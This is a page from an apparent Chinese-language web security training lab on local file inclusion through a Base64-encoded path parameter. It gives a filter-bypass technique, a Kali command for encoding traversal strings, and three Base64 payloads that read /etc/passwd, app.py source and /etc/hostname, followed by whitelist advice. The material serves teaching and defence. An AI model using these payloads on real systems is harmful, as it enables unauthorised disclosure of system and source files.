🔐 Base64 编码页面加载

参数 token 接收 Base64 编码的页面路径,解码后直接拼入文件路径

正常页面 (Base64): help about contact 🐛 攻击 (Base64): /etc/passwd app.py 源码 主机名
📄 请求: /vuln7/base64?token=aGVscA== → 解码: help
<h2>📖 帮助文档</h2>
<p>如何使用漏洞实验室:</p>
<ul>
    <li>选择左侧导航栏中的实验模块</li>
    <li>仔细阅读每个实验的说明</li>
    <li>尝试发现并利用漏洞</li>
    <li>学习防御与修复方案</li>
</ul>

💡 实验提示

Base64 编码可绕过对 ../ 等关键字符的字符串匹配过滤

编码方法:Kali 终端执行 echo -n "../../../../../etc/passwd" | base64 生成 Base64 载荷
POC 01:Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== → 解码后为 ../../../../../../etc/passwd
POC 02:Li4vYXBwLnB5 → 解码后为 ../app.py
POC 03:Li4vLi4vLi4vLi4vLi4vLi4vZXRjL2hvc3RuYW1l → 解码后为 ../../../../../../etc/hostname
⚠️ 防御要点:Base64 只是编码不是加密,不能替代输入校验。必须以白名单限制允许访问的文件。

← 返回 LFI 菜单